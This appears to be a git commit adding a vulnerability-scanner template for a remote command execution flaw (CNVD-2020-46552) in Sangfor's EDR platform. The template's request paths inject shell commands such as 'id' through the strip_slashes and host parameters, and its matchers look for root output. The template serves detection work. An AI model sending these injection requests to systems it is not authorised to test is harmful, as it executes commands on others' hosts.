Create CNVD-2020-46552.yaml
parent
e58bae51ca
commit
1cb764709e
|
@ -0,0 +1,35 @@
|
||||||
|
id: CNVD-2020-46552
|
||||||
|
info:
|
||||||
|
name: Sangfor EDR Tool RCE
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: critical
|
||||||
|
description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
|
||||||
|
reference:
|
||||||
|
- https://www.modb.pro/db/144475
|
||||||
|
- https://blog.csdn.net/bigblue00/article/details/108434009
|
||||||
|
- https://cn-sec.com/archives/721509.html
|
||||||
|
tags: cnvd,cnvd2020,sangfor,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id"
|
||||||
|
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "$show_input = function($info)"
|
||||||
|
- "$strip_slashes($host)"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "uid=0(root)"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue